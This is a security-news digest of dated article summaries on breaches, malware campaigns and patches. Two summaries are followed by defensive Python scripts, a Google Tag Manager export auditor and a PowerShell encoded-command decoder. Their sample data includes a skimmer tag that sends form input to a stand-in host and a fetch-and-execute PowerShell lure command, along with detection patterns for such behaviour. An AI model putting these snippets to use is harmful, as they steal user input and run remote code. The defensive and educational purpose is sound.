Daily Brief

Articles are listed below, newest first, each with a generated summary.

Total articles found: 12732

Checks for new stories every ~15 minutes

2024-06-19 11:04:45 thehackernews DATA BREACH Misconfiguration in Google Tag Manager Leads to Data Breach
A global ticket-selling company suffered a data breach through misconfigured Google Tag Manager (GTM) tags whose management had been outsourced. The incident shows the risk of giving up active oversight of tracking technologies and of data-privacy compliance. GTM typically connects a site to many third-party applications, often without careful configuration of what each tag may read or send, so sensitive data can leak to those third parties. Roughly 45% of the applications connected through GTM serve advertising, and a significant share of them can collect sensitive user data. The article stresses that companies must keep such tags compliant with privacy laws such as GDPR and CCPA to avoid large penalties and lawsuits, and recommends continuous web threat management that monitors and controls tag configurations, balancing marketing needs against security. The case study illustrates the financial and reputational damage GTM misconfigurations can cause across industries.
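The article argues for keeping oversight of every tag a container can fire; one concrete way to do that is to audit the container export itself rather than the live site. The script below is an added example (not code from the article or from any vendor it mentions) that walks a GTM container export, lists every custom HTML tag, the external hosts its HTML references, whether it appears to read user-entered form data, and which triggers fire it. Assumptions: the export is the GTM JSON container export with a `containerVersion` object holding `tag` and `trigger` arrays, custom HTML tags have `type: "html"` with the markup in a parameter keyed `html`, and the sample export, host names and tag names are constructed for the demonstration.

```python
import json
import re

# Constructed sample in the shape of a GTM container export (Admin > Export Container).
# Assumption: only the fields used below matter; real exports carry many more.
SAMPLE_EXPORT = json.dumps({
    "containerVersion": {
        "trigger": [
            {"triggerId": "1", "name": "All Pages", "type": "PAGEVIEW"},
            {"triggerId": "7", "name": "Checkout - Payment Form", "type": "PAGEVIEW"},
        ],
        "tag": [
            # Built-in tag type: configured through parameters, no free-form HTML.
            {"name": "GA4 Config", "type": "gaawc",
             "parameter": [{"type": "TEMPLATE", "key": "measurementId", "value": "G-XXXX"}],
             "firingTriggerId": ["1"]},
            # Custom HTML loading a third-party script on the payment page.
            {"name": "Affiliate pixel", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": '<script src="https://cdn.example-ads.test/px.js"></script>'}],
             "firingTriggerId": ["7"]},
            # Custom HTML that reads every input field and ships it off-site.
            {"name": "Form helper", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": "<script>document.querySelectorAll('input').forEach(i=>i.addEventListener('change',e=>fetch('https://collect.example-ads.test/?v='+encodeURIComponent(e.target.value))))</script>"}],
             "firingTriggerId": ["1"]},
        ],
    }
})

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Patterns that suggest the tag reads user-entered data from the page.
FORM_READ = re.compile(r'''\.value\b|querySelectorAll\(['"]input|FormData\(|document\.forms''')


def load_container(export_text):
    """Parse a container export and return its containerVersion object."""
    return json.loads(export_text)["containerVersion"]


def trigger_names(container):
    """Map triggerId -> human-readable trigger name."""
    return {t["triggerId"]: t.get("name", t["triggerId"]) for t in container.get("trigger", [])}


def tag_html(tag):
    """Return the markup of a custom HTML tag, or '' for built-in tag types."""
    if tag.get("type") != "html":
        return ""
    for p in tag.get("parameter", []):
        if p.get("key") == "html":
            return p.get("value", "")
    return ""


def audit(export_text, first_party_hosts):
    """Return one finding per custom HTML tag that talks to a non-allowlisted host
    or appears to read form input; each finding names the triggers that fire it."""
    container = load_container(export_text)
    names = trigger_names(container)
    findings = []
    for tag in container.get("tag", []):
        html = tag_html(tag)
        if not html:
            continue
        hosts = {h.lower() for h in URL_HOST.findall(html)} - {h.lower() for h in first_party_hosts}
        reads_form = bool(FORM_READ.search(html))
        if hosts or reads_form:
            findings.append({
                "tag": tag["name"],
                "external_hosts": sorted(hosts),
                "reads_form_input": reads_form,
                "fires_on": [names.get(t, t) for t in tag.get("firingTriggerId", [])],
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORT, {"www.example.test"}):
        print(f"{f['tag']}: hosts={f['external_hosts']} reads_form_input={f['reads_form_input']} fires_on={f['fires_on']}")
```

Run against a real export, the output is the list a reviewer should be signing off on: any custom HTML tag that both reaches an unapproved host and reads form fields, or that fires on a checkout or login page, is exactly the configuration the article's breach came from. The regexes are deliberately loose; they are meant to surface tags for human review, not to prove a tag safe.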
2024-06-19 10:23:42 thehackernews MALWARE Advanced Malware Campaign Targets Chinese-Speaking VPN Users
A newly identified threat group, Void Arachne, targets Chinese-speaking users by hiding malware inside Windows Installer (MSI) packages posing as popular VPN software. The primary payload, Winos 4.0, is a full-featured command-and-control (C&C) framework capable of DDoS attacks, disk searches, webcam and microphone control, keylogging, and more. The campaign spreads through social media, messaging platforms such as Telegram, and search engine optimization poisoning, exploiting demand for tools that bypass internet censorship in China. Void Arachne also uses AI-themed lures, advertising trojanized installers for deepfake pornography generators and voice-altering tools, which raises privacy and ethical concerns alongside the security risk. The installer adds firewall rules that allow its traffic, then runs a loader that executes a second-stage payload to establish long-term access and control over the infected system. Researchers identified custom plugins the attackers developed to extend Winos 4.0, indicating a high level of sophistication and room for further modular expansion. The campaign is a reminder to download software, VPN clients in particular, only from trustworthy sources.
2024-06-19 10:18:22 thehackernews CYBERCRIME Extensive Crypto Scam via Fake Meeting Software Uncovered
A cybercriminal known as markopolo is running a broad scam against cryptocurrency users built around fake virtual meeting software named Vortax and 23 other malicious applications. The applications deliver information-stealing malware for macOS and Windows, including Rhadamanthys, StealC, and Atomic macOS Stealer (AMOS). markopolo builds a facade of legitimacy for Vortax through social media, including a verified X account and a Medium blog filled with AI-generated content. Victims are reached through social media engagement and crypto-focused Discord and Telegram channels, where they are given a RoomID to enter on the Vortax website; the site then redirects them to Dropbox links or other sites that serve the malware-laden installer. Recorded Future attributes all of the builds to markopolo on the basis of shared hosting and command-and-control (C2) infrastructure, indicating a streamlined, agile operation that can move to new lures quickly once one is detected. The campaign fits the broader trend of cybercriminals abusing cloud services for phishing and info-stealing attacks.
2024-06-19 07:39:22 thehackernews MALWARE Critical Flaws in Mailcow Mail Server Allow Remote Code Execution
Two vulnerabilities in the Mailcow mail server suite can be chained to execute arbitrary code on affected servers. All Mailcow versions prior to the April 2024 release (2024-04) are affected. One flaw lets an attacker inject malicious scripts into the admin panel, potentially hijacking administrator sessions; a plausible attack is a specially crafted HTML email that triggers unauthorized actions in the admin session without further user interaction. Both vulnerabilities were reported to the project by SonarSource on March 22, 2024, and are rated moderate in severity. Successful exploitation lets an attacker run commands and access sensitive data with administrator privileges. Mailcow has released an updated version that addresses both flaws, and users are advised to update immediately.
2024-06-19 07:33:59 theregister MALWARE Malicious PowerShell Scripts Masked as Error Fixes in New Attack
Cybercriminals are using social-engineering attacks that trick users into running malicious PowerShell themselves by presenting fake error messages for popular software such as Google Chrome and Microsoft Word. Visitors to legitimate but compromised websites see a pop-up warning that tells them to fix the problem by pasting a script into a PowerShell terminal; the script downloads and executes malware. At least two criminal operations, TA571 and the group behind the ClearFake campaign, are using this tactic, and a third cluster that Proofpoint calls ClickFix has recently adopted it. The delivered malware can steal credentials, hijack cryptocurrency transactions, and install further malware, including ransomware. The ClearFake campaign hosts its malicious scripts using "EtherHiding", a technique (named by Guardio Labs) that stores the scripts in smart contracts on a public blockchain, which complicates takedown and tracking. One campaign has users copy a Base64-encoded PowerShell command that leads to the installation of additional malware loaders and potentially ransomware. Proofpoint emphasizes training so that employees recognize and report these lures, and notes that the technique is both persistent and still evolving.
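The Base64 stage in these lures is ordinary `powershell -EncodedCommand` encoding (UTF-16LE text, Base64-encoded), so process-creation telemetry can be decoded and inspected. The script below is an added example (not from Proofpoint's report or any of the campaigns) that finds an encoded-command argument on a command line, decodes it, and flags the behaviours these lures rely on: downloading content, running it in memory, and hiding the window. Assumptions: `powershell.exe` accepts any unambiguous prefix of `-EncodedCommand` (`-e`, `-ec`, `-enc`, ...), which is why the flag is matched loosely and then checked as a prefix; the sample command lines, URL and indicator list are constructed for the demonstration and are not real telemetry.

```python
import base64
import re

# Match "-e<something> <token>" and decide afterwards whether the flag is really a
# prefix of "encodedcommand"; this keeps -ExecutionPolicy Bypass out of the decoder.
FLAG_ARG = re.compile(r"-([eE][A-Za-z]*)\s+(\S+)")

# Indicator patterns run over the command line plus the decoded payload.
SUSPICIOUS = [
    ("download", re.compile(r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b")),
    ("exec-in-memory", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("hidden-window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
]


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then Base64).
    Used here only to build sample input the way the lure page would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line has none."""
    for m in FLAG_ARG.finditer(cmdline):
        flag, token = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(token, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            # Not valid Base64/UTF-16LE: some other argument that happens to start with -e.
            continue
    return None


def analyze(cmdline):
    """Decode any encoded payload and report which suspicious behaviours appear."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in SUSPICIOUS if rx.search(text)]
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits}


# Constructed sample process-creation command lines (not real telemetry).
LURE_SCRIPT = "iex (iwr 'https://lure.example.test/fix.txt' -UseBasicParsing)"
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -w hidden -e " + encode_ps(LURE_SCRIPT),
    'powershell.exe "iwr https://lure.example.test/fix.txt | iex"',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyze(line)
        verdict = "SUSPICIOUS" if r["indicators"] else "ok"
        print(f"{verdict:10} encoded={r['encoded']} indicators={r['indicators']}")
        if r["decoded"]:
            print(f"           decoded: {r['decoded']}")
```

In practice the decoded text is what you hunt on: the lure changes the visible wording, but the payload still has to fetch something and hand it to `iex`. Pairing this with the parent process (a terminal or the Run dialog launched by the user rather than a script host) is what separates a ClickFix-style paste from an administrator's own encoded command.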
2024-06-18 23:49:27 theregister CYBERCRIME Former IT Director Admits $2.1 Million Fraud, Faces Prison
Ronald Simpson, ex-IT director at Webster University, pleaded guilty to a $2.1 million fraud involving the university and a computer equipment supplier. Simpson orchestrated a scheme from 2018 to 2023, misleading both the school and supplier to enrich himself through illicit sales. He faces up to 20 years in prison and a $250,000 fine with sentencing scheduled for September. The fraud entailed Simpson purchasing equipment under false pretenses and selling it to a third party, diverting funds to his personal accounts. Webster University terminated Simpson in September 2023 upon discovering the fraudulent activities. As part of the scam, Simpson exploited a return policy meant for defective items, falsely claiming equipment issues to receive and then sell replacements. The FBI conducted the investigation that led to Simpson’s guilty plea.
2024-06-18 23:03:24 theregister DATA BREACH AMD Internal Data Allegedly Sold on Dark Web by Notorious Hacker
AMD internal data is being advertised for sale on the dark web by an individual using the pseudonym IntelBroker. The listing reportedly includes customer databases, product specifications, internal financial details, employee information, and source code, among other sensitive documents. AMD says it is aware of the claim and is working with law enforcement and a third-party provider to investigate. IntelBroker, the seller, is known for distributing data from earlier high-profile breaches, including incidents involving Europol, Home Depot, and the Pentagon. Whether the data is genuine, and what it is actually worth, is unclear, which is itself a risk for would-be buyers. If genuine, the exposure could be useful to phishers, fraudsters, and unscrupulous investors. Law enforcement is actively pursuing people associated with BreachForums, increasing the pressure on IntelBroker and other users of the platform.
2024-06-18 22:27:23 theregister NATION STATE ACTIVITY EU Proposal on Encryption Threatens Privacy and Security
The EU Council has delayed a vote on a legislative proposal, intended to protect children online, that would mandate scanning of private digital communications for illegal content. Critics, including tech companies and civil liberties groups, argue that the proposal, known as Chat Control, would undermine encryption and with it user privacy and security. The proposed client-side scanning, or "upload moderation," would require internet services to scan messages and media on the device before encryption, looking for material such as child sexual abuse material (CSAM). The approach has been widely contested; similar plans announced by Apple in 2021 were shelved after significant opposition. Signal's president Meredith Whittaker has argued that such scanning cannot be built without introducing vulnerabilities with wide-reaching consequences. Members of the European Parliament have urged the Council to reject the proposal, warning that it contradicts the European commitment to secure communication and digital privacy. Threema has said it would leave the EU market rather than comply, citing the loss of secure and private communication for EU citizens and professionals.
2024-06-18 21:30:55 bleepingcomputer DATA BREACH AMD Probes Potential Data Breach Exposed on Hacker Forum
AMD is investigating a possible cyberattack after data claimed to be stolen from the company was listed for sale on a hacking forum. The threat actor, IntelBroker, claims to hold AMD employee details, confidential financial records, details of future AMD products, employee databases, and other sensitive files. AMD is working closely with law enforcement and a third-party hosting provider to determine whether the data is genuine and how significant it is. IntelBroker has been linked to previous breaches involving DC Health Link and the Europol Platform for Experts, among other significant incidents. AMD has been here before: in June 2022 the RansomHouse extortion group claimed a substantial theft of AMD data. The company has not confirmed the new claim while its investigation continues.
2024-06-18 20:29:18 bleepingcomputer CYBERCRIME Phishing-as-a-Service Targets Microsoft 365 in Financial Sector
Researchers have identified a phishing-as-a-service platform, ONNX Store, aimed at Microsoft 365 accounts, primarily at financial institutions. ONNX Store embeds QR codes in PDF attachments to get past link-scanning defenses, delivered to employees under the guise of HR communication. The platform, believed to be operated by the Arabic-speaking actor MRxC0DER, serves phishing pages that replicate the Microsoft 365 login screen and capture credentials in real time. Customers manage their campaigns through Telegram bots, with customizable Microsoft Office 365 phishing templates and support channels for operational help. Observed emails impersonate HR departments, promising salary updates to lure victims into scanning the QR code and entering their credentials. Captured credentials and 2FA codes are relayed to the attackers immediately, so a one-time code can be used before it expires and the account opened for unauthorized access to company data. The infrastructure uses encrypted JavaScript, Cloudflare services, and bulletproof hosting to evade detection and stay online. Recommended defenses include blocking unverified PDF and HTML attachments, not trusting a site simply because it uses HTTPS, and issuing FIDO2 hardware keys for high-risk accounts, which a relayed one-time code cannot defeat.
2024-06-18 18:10:53 bleepingcomputer CYBERCRIME VMware Releases Fixes for Critical vCenter Server Flaws
VMware issued a security advisory for critical vulnerabilities in vCenter Server that enable remote code execution and local privilege escalation. Affected products are vCenter Server 7.0 and 8.0 and VMware Cloud Foundation 4.x and 5.x. Three vulnerabilities were addressed: CVE-2024-37079, CVE-2024-37080, and CVE-2024-37081. Fixes are in vCenter Server 8.0 U2d, 8.0 U1e, and 7.0 U3r; Cloud Foundation patches are available through KB88287. VMware states that updating vCenter Server does not affect running workloads or VMs, although management interfaces will likely be unavailable for a time during the upgrade. No exploitation in the wild has been detected, but VMware urges immediate patching given the likelihood that threat actors will target the flaws. The company also flagged a known issue with custom ciphers in 7.0 U3r and recommends running the precheck before upgrading.
2024-06-18 17:29:37 bleepingcomputer DATA BREACH Medibank Data Breach Uncovered: Multifactor Authentication Lapses
An investigative report by the Australian Information Commissioner found significant security failures at Medibank, including multi-factor authentication (MFA) that was not enforced, leading to a severe data breach. The intrusion began when malware on a Medibank contractor's home computer stole work credentials saved in his browser. The attacker used those credentials to reach Medibank's systems, including Microsoft Exchange and the VPN, and from there gained extensive internal access. Between August 25 and October 13, 2022, the attacker exfiltrated 520 GB of customer data, including personal and health information. EDR alerts raised in late August were not acted on, so the intrusion went undetected until mid-October. The breach, disclosed by Medibank in October 2022, exposed the personal data of 9.7 million customers. The report underscores the need for controls such as enforced MFA, especially on VPNs and other remote-access systems that attackers target heavily.
2024-06-18 16:23:07 thehackernews MISCELLANEOUS EU Proposal Threatens Encryption with Private Message Scans
The European Union has introduced a controversial proposal to scan users' private messages for child sexual abuse material (CSAM), raising significant concerns among privacy advocates. Meredith Whittaker, president of the Signal Foundation, criticized the proposal as fundamentally undermining end-to-end encryption (E2EE). The measure, known as "upload moderation," would require messages to be analyzed before they are encrypted so that CSAM can be detected. The proposal excludes audio communications and would require users to consent to scanning under the provider's terms of service; users who decline would be limited in what they can share. Europol has called for tech-industry cooperation to balance public safety and privacy, suggesting systems that can report harmful activity without breaking encryption. The tech community's response, Apple's included, highlights concerns about privacy infringement and the potential for such measures to expand into broader surveillance. Signal warns that interfering with the encryption or adding backdoors for scanning would create vulnerabilities exploitable by criminals and nation-state attackers alike.
2024-06-18 15:06:12 theregister MISCELLANEOUS CHERI Alliance Aims to Enhance Global CPU Security Standards
The CHERI Alliance CIC has been established to promote adoption of CHERI, a hardware security technology that improves memory safety in CPUs. Founding members include the FreeBSD Foundation, the University of Cambridge, and various security and chip-design companies. CHERI prevents common memory vulnerabilities such as buffer overflows by replacing raw pointers with hardware-enforced capabilities that carry bounds and permissions, so out-of-bounds and unauthorized accesses fault instead of succeeding. Despite its significant role in developing CHERI, chip designer Arm is conspicuously absent from the member list. The Alliance aims to stimulate industry collaboration, foster academic partnerships, and push for CHERI implementations across different ISAs. CHERI is cited in a White House report emphasizing the importance of hardware support for robust memory safety. Current efforts center on the RISC-V ISA, suggesting a strategic pivot or a broadening of the technology's foundations. The CHERI Alliance is set to formally launch in September and is open for new members now.
2024-06-18 14:50:37 bleepingcomputer DATA BREACH Two Hackers Plead Guilty to Blackmail Using Law Enforcement Data
Two individuals, Sagar Steven Singh and Nicholas Ceraolo, pleaded guilty to hacking a federal law enforcement database as part of a blackmail scheme. Both belonged to "ViLE", a group that used stolen personal information to extort money by threatening to publish it. They used a police officer's stolen credentials to access a law enforcement database containing sensitive information about criminal activity and personal data. Ceraolo also impersonated officers to obtain additional personal data from social media platforms under false pretenses. The data was used in blackmail attempts, including threats to disclose social security numbers and home addresses unless payment was received. In one incident, Singh demanded Instagram account credentials while threatening the target's family. The U.S. Department of Justice is prosecuting the case; Singh and Ceraolo each face sentences of two to seven years. Efforts to apprehend and prosecute other members of the ViLE group are ongoing.